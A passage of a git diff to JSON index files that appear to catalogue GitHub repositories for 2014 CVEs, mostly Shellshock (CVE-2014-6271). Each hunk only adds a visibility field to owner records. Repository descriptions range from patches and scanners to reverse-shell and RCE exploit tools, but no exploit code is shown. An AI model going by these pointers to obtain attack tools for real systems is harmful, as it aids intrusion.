"html_url": "https:\/\/github.com\/redes-2015", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/redes-2015\/l2tp-socket-bug", "description": "Estudo e apresentação do bug CVE-2014-4943 para a disciplina MAC0448", diff --git a/2014/CVE-2014-5139.json b/2014/CVE-2014-5139.json index 52c46c7e72..763f1d95a8 100644 --- a/2014/CVE-2014-5139.json +++ b/2014/CVE-2014-5139.json @@ -7,7 +7,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/CVE-2014-5139", "description": null, @@ -37,7 +38,8 @@ "login": "uthrasri", "id": 145666390, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/145666390?v=4", - "html_url": "https:\/\/github.com\/uthrasri" + "html_url": "https:\/\/github.com\/uthrasri", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/uthrasri\/G2.5_openssl_CVE-2014-5139", "description": null, diff --git a/2014/CVE-2014-5284.json b/2014/CVE-2014-5284.json index 425b02975e..993dc847b6 100644 --- a/2014/CVE-2014-5284.json +++ b/2014/CVE-2014-5284.json @@ -7,7 +7,8 @@ "login": "mbadanoiu", "id": 18383407, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/18383407?v=4", - "html_url": "https:\/\/github.com\/mbadanoiu" + "html_url": "https:\/\/github.com\/mbadanoiu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mbadanoiu\/CVE-2014-5284", "description": "Bash implementation of CVE-2014-5284", diff --git a/2014/CVE-2014-5460.json b/2014/CVE-2014-5460.json index 8aed8d349a..f6082fe671 100644 --- a/2014/CVE-2014-5460.json +++ b/2014/CVE-2014-5460.json @@ -7,7 +7,8 @@ "login": "brookeses69", "id": 83194919, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/83194919?v=4", - "html_url": "https:\/\/github.com\/brookeses69" + "html_url": "https:\/\/github.com\/brookeses69", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/brookeses69\/CVE-2014-5460", "description": "CVE-2014-5460", diff --git a/2014/CVE-2014-6271.json b/2014/CVE-2014-6271.json index c20469c78c..eb327453e9 100644 --- a/2014/CVE-2014-6271.json +++ b/2014/CVE-2014-6271.json @@ -7,7 +7,8 @@ "login": "dlitz", "id": 99377, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/99377?v=4", - "html_url": "https:\/\/github.com\/dlitz" + "html_url": "https:\/\/github.com\/dlitz", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/dlitz\/bash-cve-2014-6271-fixes", "description": "Collected fixes for bash CVE-2014-6271", @@ -37,7 +38,8 @@ "login": "npm", "id": 6078720, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6078720?v=4", - "html_url": "https:\/\/github.com\/npm" + "html_url": "https:\/\/github.com\/npm", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/npm\/ansible-bashpocalypse", "description": "Patch for CVE-2014-6271", @@ -67,7 +69,8 @@ "login": "ryancnelson", "id": 347171, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/347171?v=4", - "html_url": "https:\/\/github.com\/ryancnelson" + "html_url": "https:\/\/github.com\/ryancnelson", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ryancnelson\/patched-bash-4.3", "description": "patched-bash-4.3 for CVE-2014-6271", @@ -97,7 +100,8 @@ "login": "jblaine", "id": 438740, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/438740?v=4", - "html_url": "https:\/\/github.com\/jblaine" + "html_url": "https:\/\/github.com\/jblaine", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/jblaine\/cookbook-bash-CVE-2014-6271", "description": "Chef cookbook that will fail if bash vulnerability found per CVE-2014-6271", @@ -127,7 +131,8 @@ "login": "rrreeeyyy", "id": 2457736, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2457736?v=4", - "html_url": "https:\/\/github.com\/rrreeeyyy" + "html_url": "https:\/\/github.com\/rrreeeyyy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rrreeeyyy\/cve-2014-6271-spec", "description": null, @@ -157,7 +162,8 @@ "login": "scottjpack", "id": 2293674, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2293674?v=4", - "html_url": "https:\/\/github.com\/scottjpack" + "html_url": "https:\/\/github.com\/scottjpack", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/scottjpack\/shellshock_scanner", "description": "Python Scanner for \"ShellShock\" (CVE-2014-6271)", @@ -187,7 +193,8 @@ "login": "Anklebiter87", "id": 6879102, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6879102?v=4", - "html_url": "https:\/\/github.com\/Anklebiter87" + "html_url": "https:\/\/github.com\/Anklebiter87", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Anklebiter87\/Cgi-bin_bash_Reverse", "description": "Written fro CVE-2014-6271", @@ -217,7 +224,8 @@ "login": "justzx2011", "id": 1185865, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1185865?v=4", - "html_url": "https:\/\/github.com\/justzx2011" + "html_url": "https:\/\/github.com\/justzx2011", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/justzx2011\/bash-up", "description": "a auto script to fix CVE-2014-6271 bash vulnerability", @@ -247,7 +255,8 @@ "login": "mattclegg", "id": 303487, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/303487?v=4", - "html_url": "https:\/\/github.com\/mattclegg" + "html_url": "https:\/\/github.com\/mattclegg", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mattclegg\/CVE-2014-6271", "description": null, @@ -277,7 +286,8 @@ "login": "ilismal", "id": 5867683, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5867683?v=4", - "html_url": "https:\/\/github.com\/ilismal" + "html_url": "https:\/\/github.com\/ilismal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ilismal\/Nessus_CVE-2014-6271_check", "description": "Quick and dirty nessus .audit file to check is bash is vulnerable to CVE-2014-6271", @@ -307,7 +317,8 @@ "login": "RainMak3r", "id": 3872733, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3872733?v=4", - "html_url": "https:\/\/github.com\/RainMak3r" + "html_url": "https:\/\/github.com\/RainMak3r", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/RainMak3r\/Rainstorm", "description": "CVE-2014-6271 RCE tool ", @@ -337,7 +348,8 @@ "login": "gabemarshall", "id": 2541585, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2541585?v=4", - "html_url": "https:\/\/github.com\/gabemarshall" + "html_url": "https:\/\/github.com\/gabemarshall", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/gabemarshall\/shocknaww", "description": "Simple script to check for CVE-2014-6271", @@ -367,7 +379,8 @@ "login": "woltage", "id": 250504, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/250504?v=4", - "html_url": "https:\/\/github.com\/woltage" + "html_url": "https:\/\/github.com\/woltage", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/woltage\/CVE-2014-6271", "description": null, @@ -397,7 +410,8 @@ "login": "ariarijp", "id": 635649, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/635649?v=4", - "html_url": "https:\/\/github.com\/ariarijp" + "html_url": "https:\/\/github.com\/ariarijp", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ariarijp\/vagrant-shellshock", "description": "CVE-2014-6271の検証用Vagrantfileです", @@ -427,7 +441,8 @@ "login": "themson", "id": 6145047, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6145047?v=4", - "html_url": "https:\/\/github.com\/themson" + "html_url": "https:\/\/github.com\/themson", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/themson\/shellshock", "description": "scripts associate with bourne shell EVN function parsing vulnerability CVE-2014-6271", @@ -457,7 +472,8 @@ "login": "securusglobal", "id": 709629, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/709629?v=4", - "html_url": "https:\/\/github.com\/securusglobal" + "html_url": "https:\/\/github.com\/securusglobal", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/securusglobal\/BadBash", "description": "CVE-2014-6271 (ShellShock) RCE PoC tool ", @@ -487,7 +503,8 @@ "login": "villadora", "id": 724998, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/724998?v=4", - "html_url": "https:\/\/github.com\/villadora" + "html_url": "https:\/\/github.com\/villadora", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/villadora\/CVE-2014-6271", "description": "scaner for cve-2014-6271", @@ -517,7 +534,8 @@ "login": "APSL", "id": 469968, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/469968?v=4", - "html_url": "https:\/\/github.com\/APSL" + "html_url": "https:\/\/github.com\/APSL", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/APSL\/salt-shellshock", "description": "Salt recipe for shellshock (CVE-2014-6271)", @@ -547,7 +565,8 @@ "login": "teedeedubya", "id": 6623145, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6623145?v=4", - "html_url": "https:\/\/github.com\/teedeedubya" + "html_url": "https:\/\/github.com\/teedeedubya", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/teedeedubya\/bash-fix-exploit", "description": "Ansible role to check the CVE-2014-6271 vulnerability", @@ -577,7 +596,8 @@ "login": "internero", "id": 553577, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/553577?v=4", - "html_url": "https:\/\/github.com\/internero" + "html_url": "https:\/\/github.com\/internero", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/internero\/debian-lenny-bash_3.2.52-cve-2014-6271", "description": "Debian Lenny Bash packages with cve-2014-6271 patches (i386 and amd64)", @@ -607,7 +627,8 @@ "login": "u20024804", "id": 47252, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47252?v=4", - "html_url": "https:\/\/github.com\/u20024804" + "html_url": "https:\/\/github.com\/u20024804", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u20024804\/bash-3.2-fixed-CVE-2014-6271", "description": null, @@ -637,7 +658,8 @@ "login": "u20024804", "id": 47252, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47252?v=4", - "html_url": "https:\/\/github.com\/u20024804" + "html_url": "https:\/\/github.com\/u20024804", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u20024804\/bash-4.2-fixed-CVE-2014-6271", "description": null, @@ -667,7 +689,8 @@ "login": "u20024804", "id": 47252, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/47252?v=4", - "html_url": "https:\/\/github.com\/u20024804" + "html_url": "https:\/\/github.com\/u20024804", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/u20024804\/bash-4.3-fixed-CVE-2014-6271", "description": null, @@ -697,7 +720,8 @@ "login": "francisck", "id": 8943367, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8943367?v=4", - "html_url": "https:\/\/github.com\/francisck" + "html_url": "https:\/\/github.com\/francisck", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/francisck\/shellshock-cgi", "description": "A python script to enumerate CGI scripts vulnerable to CVE-2014-6271 on one specific server", @@ -727,7 +751,8 @@ "login": "proclnas", "id": 3154242, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3154242?v=4", - "html_url": "https:\/\/github.com\/proclnas" + "html_url": "https:\/\/github.com\/proclnas", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/proclnas\/ShellShock-CGI-Scan", "description": "A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug)", @@ -757,7 +782,8 @@ "login": "sch3m4", "id": 607081, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/607081?v=4", - "html_url": "https:\/\/github.com\/sch3m4" + "html_url": "https:\/\/github.com\/sch3m4", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sch3m4\/RIS", "description": "CVE-2014-6271 Remote Interactive Shell - PoC Exploit", @@ -787,7 +813,8 @@ "login": "ryeyao", "id": 1586403, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1586403?v=4", - "html_url": "https:\/\/github.com\/ryeyao" + "html_url": "https:\/\/github.com\/ryeyao", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ryeyao\/CVE-2014-6271_Test", "description": null, @@ -817,7 +844,8 @@ "login": "cj1324", "id": 489649, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/489649?v=4", - "html_url": "https:\/\/github.com\/cj1324" + "html_url": "https:\/\/github.com\/cj1324", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cj1324\/CGIShell", "description": "shellshock CVE-2014-6271 CGI Exploit, Use like Openssh via CGI", @@ -847,7 +875,8 @@ "login": "renanvicente", "id": 5564668, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/5564668?v=4", - "html_url": "https:\/\/github.com\/renanvicente" + "html_url": "https:\/\/github.com\/renanvicente", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/renanvicente\/puppet-shellshock", "description": "This module determine the vulnerability of a bash binary to the shellshock exploits (CVE-2014-6271 or CVE-2014-7169) and then patch that where possible", @@ -877,7 +906,8 @@ "login": "indiandragon", "id": 1708856, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1708856?v=4", - "html_url": "https:\/\/github.com\/indiandragon" + "html_url": "https:\/\/github.com\/indiandragon", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/indiandragon\/Shellshock-Vulnerability-Scan", "description": "Android app to scan for bash Vulnerability - CVE-2014-6271 also known as Shellshock", @@ -907,7 +937,8 @@ "login": "ramnes", "id": 835072, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/835072?v=4", - "html_url": "https:\/\/github.com\/ramnes" + "html_url": "https:\/\/github.com\/ramnes", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/ramnes\/pyshellshock", "description": ":scream: Python library and utility for CVE-2014-6271 (aka. \"shellshock\")", @@ -942,7 +973,8 @@ "login": "akiraaisha", "id": 6212018, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6212018?v=4", - "html_url": "https:\/\/github.com\/akiraaisha" + "html_url": "https:\/\/github.com\/akiraaisha", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/akiraaisha\/shellshocker-python", "description": "This is a Python Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271", @@ -972,7 +1004,8 @@ "login": "352926", "id": 2149434, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/2149434?v=4", - "html_url": "https:\/\/github.com\/352926" + "html_url": "https:\/\/github.com\/352926", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/352926\/shellshock_crawler", "description": "Using google to scan sites for \"ShellShock\" (CVE-2014-6271)", @@ -1002,7 +1035,8 @@ "login": "kelleykong", "id": 6037450, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6037450?v=4", - "html_url": "https:\/\/github.com\/kelleykong" + "html_url": "https:\/\/github.com\/kelleykong", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kelleykong\/cve-2014-6271-mengjia-kong", "description": "system reading course", @@ -1032,7 +1066,8 @@ "login": "huanlu", "id": 7565089, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7565089?v=4", - "html_url": "https:\/\/github.com\/huanlu" + "html_url": "https:\/\/github.com\/huanlu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/huanlu\/cve-2014-6271-huan-lu", "description": "reading course", @@ -1062,7 +1097,8 @@ "login": "sunnyjiang", "id": 3793477, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/3793477?v=4", - "html_url": "https:\/\/github.com\/sunnyjiang" + "html_url": "https:\/\/github.com\/sunnyjiang", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/sunnyjiang\/shellshocker-android", "description": "This is an Android Application that helps you detect if your machine that run bash is vulnerable by CVE-2014-6271", @@ -1092,7 +1128,8 @@ "login": "P0cL4bs", "id": 8557864, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/8557864?v=4", - "html_url": "https:\/\/github.com\/P0cL4bs" + "html_url": "https:\/\/github.com\/P0cL4bs", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/P0cL4bs\/ShellShock-CGI-Scan", "description": "A script, in C, to check if CGI scripts are vulnerable to CVE-2014-6271 (The Bash Bug).", @@ -1122,7 +1159,8 @@ "login": "hmlio", "id": 11684719, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/11684719?v=4", - "html_url": "https:\/\/github.com\/hmlio" + "html_url": "https:\/\/github.com\/hmlio", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hmlio\/vaas-cve-2014-6271", "description": "Vulnerability as a service: showcasing CVS-2014-6271, a.k.a. Shellshock", @@ -1152,7 +1190,8 @@ "login": "opsxcq", "id": 16995025, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16995025?v=4", - "html_url": "https:\/\/github.com\/opsxcq" + "html_url": "https:\/\/github.com\/opsxcq", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/opsxcq\/exploit-CVE-2014-6271", "description": "Shellshock exploit + vulnerable environment", @@ -1189,7 +1228,8 @@ "login": "Pilou-Pilou", "id": 6388024, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6388024?v=4", - "html_url": "https:\/\/github.com\/Pilou-Pilou" + "html_url": "https:\/\/github.com\/Pilou-Pilou", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Pilou-Pilou\/docker_CVE-2014-6271.", "description": null, @@ -1219,7 +1259,8 @@ "login": "zalalov", "id": 15165282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/15165282?v=4", - "html_url": "https:\/\/github.com\/zalalov" + "html_url": "https:\/\/github.com\/zalalov", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/zalalov\/CVE-2014-6271", "description": "Shellshock POC | CVE-2014-6271 | cgi-bin reverse shell", @@ -1249,7 +1290,8 @@ "login": "heikipikker", "id": 16557916, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/16557916?v=4", - "html_url": "https:\/\/github.com\/heikipikker" + "html_url": "https:\/\/github.com\/heikipikker", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/heikipikker\/shellshock-shell", "description": "A simple python shell-like exploit for the Shellschok CVE-2014-6271 bug.", @@ -1279,7 +1321,8 @@ "login": "0x00-0x00", "id": 23364530, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/23364530?v=4", - "html_url": "https:\/\/github.com\/0x00-0x00" + "html_url": "https:\/\/github.com\/0x00-0x00", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0x00-0x00\/CVE-2014-6271", "description": "Shellshock exploitation script that is able to upload and RCE using any vector due to its versatility.", @@ -1309,7 +1352,8 @@ "login": "kowshik-sundararajan", "id": 14358565, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14358565?v=4", - "html_url": "https:\/\/github.com\/kowshik-sundararajan" + "html_url": "https:\/\/github.com\/kowshik-sundararajan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/kowshik-sundararajan\/CVE-2014-6271", "description": "CS4238 Computer Security Practices", @@ -1339,7 +1383,8 @@ "login": "w4fz5uck5", "id": 32375656, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/32375656?v=4", - "html_url": "https:\/\/github.com\/w4fz5uck5" + "html_url": "https:\/\/github.com\/w4fz5uck5", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/w4fz5uck5\/ShockZaum-CVE-2014-6271", "description": "Shellshock vulnerability attacker", @@ -1369,7 +1414,8 @@ "login": "Aruthw", "id": 38236012, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/38236012?v=4", - "html_url": "https:\/\/github.com\/Aruthw" + "html_url": "https:\/\/github.com\/Aruthw", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Aruthw\/CVE-2014-6271", "description": null, @@ -1399,7 +1445,8 @@ "login": "cved-sources", "id": 46423677, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46423677?v=4", - "html_url": "https:\/\/github.com\/cved-sources" + "html_url": "https:\/\/github.com\/cved-sources", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cved-sources\/cve-2014-6271", "description": "cve-2014-6271", @@ -1429,7 +1476,8 @@ "login": "shawntns", "id": 22453528, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22453528?v=4", - "html_url": "https:\/\/github.com\/shawntns" + "html_url": "https:\/\/github.com\/shawntns", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/shawntns\/exploit-CVE-2014-6271", "description": null, @@ -1459,7 +1507,8 @@ "login": "Sindadziy", "id": 55396899, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55396899?v=4", - "html_url": "https:\/\/github.com\/Sindadziy" + "html_url": "https:\/\/github.com\/Sindadziy", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sindadziy\/cve-2014-6271", "description": null, @@ -1489,7 +1538,8 @@ "login": "wenyu1999", "id": 55389198, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55389198?v=4", - "html_url": "https:\/\/github.com\/wenyu1999" + "html_url": "https:\/\/github.com\/wenyu1999", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/wenyu1999\/bash-shellshock", "description": "cve-2014-6271", @@ -1519,7 +1569,8 @@ "login": "Sindayifu", "id": 55397670, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/55397670?v=4", - "html_url": "https:\/\/github.com\/Sindayifu" + "html_url": "https:\/\/github.com\/Sindayifu", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Sindayifu\/CVE-2019-14287-CVE-2014-6271", "description": null, @@ -1549,7 +1600,8 @@ "login": "Any3ite", "id": 20638313, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/20638313?v=4", - "html_url": "https:\/\/github.com\/Any3ite" + "html_url": "https:\/\/github.com\/Any3ite", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Any3ite\/CVE-2014-6271", "description": null, @@ -1579,7 +1631,8 @@ "login": "somhm-solutions", "id": 56839517, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56839517?v=4", - "html_url": "https:\/\/github.com\/somhm-solutions" + "html_url": "https:\/\/github.com\/somhm-solutions", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/somhm-solutions\/Shell-Shock", "description": "*CVE-2014-6271* Unix Arbitrary Code Execution Exploit commonly know as Shell Shock. Examples, Docs, Incident Response and Vulnerability\/Risk Assessment, and Additional Resources may be dumped here. Enjoy :) --- somhmxxghoul ---", @@ -1609,7 +1662,8 @@ "login": "rashmikadileeshara", "id": 63233037, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63233037?v=4", - "html_url": "https:\/\/github.com\/rashmikadileeshara" + "html_url": "https:\/\/github.com\/rashmikadileeshara", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/rashmikadileeshara\/CVE-2014-6271-Shellshock-", "description": "This is an individual assignment for secure network programming", @@ -1639,7 +1693,8 @@ "login": "Dilith006", "id": 53945641, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/53945641?v=4", - "html_url": "https:\/\/github.com\/Dilith006" + "html_url": "https:\/\/github.com\/Dilith006", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Dilith006\/CVE-2014-6271", "description": null, @@ -1669,7 +1724,8 @@ "login": "cyberharsh", "id": 57433814, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57433814?v=4", - "html_url": "https:\/\/github.com\/cyberharsh" + "html_url": "https:\/\/github.com\/cyberharsh", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/cyberharsh\/Shellbash-CVE-2014-6271", "description": null, @@ -1699,7 +1755,8 @@ "login": "MuirlandOracle", "id": 58998623, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/58998623?v=4", - "html_url": "https:\/\/github.com\/MuirlandOracle" + "html_url": "https:\/\/github.com\/MuirlandOracle", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/MuirlandOracle\/CVE-2014-6271-IPFire", "description": null, @@ -1729,7 +1786,8 @@ "login": "mochizuki875", "id": 37737691, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37737691?v=4", - "html_url": "https:\/\/github.com\/mochizuki875" + "html_url": "https:\/\/github.com\/mochizuki875", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mochizuki875\/CVE-2014-6271-Apache-Debian", "description": "This Repo is PoC environment of CVE-2014-6271(https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2014-6271).", @@ -1759,7 +1817,8 @@ "login": "b4keSn4ke", "id": 44183775, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/44183775?v=4", - "html_url": "https:\/\/github.com\/b4keSn4ke" + "html_url": "https:\/\/github.com\/b4keSn4ke", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/b4keSn4ke\/CVE-2014-6271", "description": "Shellshock exploit aka CVE-2014-6271", @@ -1800,7 +1859,8 @@ "login": "hadrian3689", "id": 71423134, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/71423134?v=4", - "html_url": "https:\/\/github.com\/hadrian3689" + "html_url": "https:\/\/github.com\/hadrian3689", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hadrian3689\/shellshock", "description": "CVE-2014-6271 Shellshock", @@ -1830,7 +1890,8 @@ "login": "akr3ch", "id": 97300177, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/97300177?v=4", - "html_url": "https:\/\/github.com\/akr3ch" + "html_url": "https:\/\/github.com\/akr3ch", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/akr3ch\/CVE-2014-6271", "description": "ShellShock interactive-shell exploit", @@ -1864,7 +1925,8 @@ "login": "0xConstant", "id": 51972282, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/51972282?v=4", - "html_url": "https:\/\/github.com\/0xConstant" + "html_url": "https:\/\/github.com\/0xConstant", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xConstant\/CVE-2014-6271", "description": null, @@ -1894,7 +1956,8 @@ "login": "Gurguii", "id": 101645735, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/101645735?v=4", - "html_url": "https:\/\/github.com\/Gurguii" + "html_url": "https:\/\/github.com\/Gurguii", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Gurguii\/cgi-bin-shellshock", "description": "[Python\/Shell] - Tested in HackTheBox - Shocker (Easy) CVE-2014-6271", @@ -1924,7 +1987,8 @@ "login": "anujbhan", "id": 14915809, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/14915809?v=4", - "html_url": "https:\/\/github.com\/anujbhan" + "html_url": "https:\/\/github.com\/anujbhan", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/anujbhan\/shellshock-victim-host", "description": "A docker container vulnerable to Shellshock - CVE-2014-6271", @@ -1954,7 +2018,8 @@ "login": "FilipStudeny", "id": 81091191, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/81091191?v=4", - "html_url": "https:\/\/github.com\/FilipStudeny" + "html_url": "https:\/\/github.com\/FilipStudeny", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/FilipStudeny\/-CVE-2014-6271-Shellshock-Remote-Command-Injection-", "description": "[CVE-2014-6271] Apache Shellshock Remote Command Injection tool for quick reverse shell and file browsing", @@ -1984,7 +2049,8 @@ "login": "mritunjay-k", "id": 41521418, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/41521418?v=4", - "html_url": "https:\/\/github.com\/mritunjay-k" + "html_url": "https:\/\/github.com\/mritunjay-k", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/mritunjay-k\/CVE-2014-6271", "description": null, @@ -2014,7 +2080,8 @@ "login": "Brandaoo", "id": 93392038, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/93392038?v=4", - "html_url": "https:\/\/github.com\/Brandaoo" + "html_url": "https:\/\/github.com\/Brandaoo", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Brandaoo\/CVE-2014-6271", "description": null, @@ -2044,7 +2111,8 @@ "login": "Jsmoreira02", "id": 103542430, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/103542430?v=4", - "html_url": "https:\/\/github.com\/Jsmoreira02" + "html_url": "https:\/\/github.com\/Jsmoreira02", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/Jsmoreira02\/CVE-2014-6271", "description": "Exploitation of \"Shellshock\" Vulnerability. Remote code execution in Apache with mod_cgi", @@ -2082,7 +2150,8 @@ "login": "hanmin0512", "id": 37041208, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37041208?v=4", - "html_url": "https:\/\/github.com\/hanmin0512" + "html_url": "https:\/\/github.com\/hanmin0512", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/hanmin0512\/CVE-2014-6271_pwnable", "description": null, @@ -2112,7 +2181,8 @@ "login": "0xTabun", "id": 144548207, "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/144548207?v=4", - "html_url": "https:\/\/github.com\/0xTabun" + "html_url": "https:\/\/github.com\/0xTabun", + "user_view_type": "public" }, "html_url": "https:\/\/github.com\/0xTabun\/CVE-2014-6271", "description": "Shellshock vulnerability reverse shell", @@ -2142,7 +2212,8 @@ "login": "0xN7y", "id": 70061541, "avatar_url": 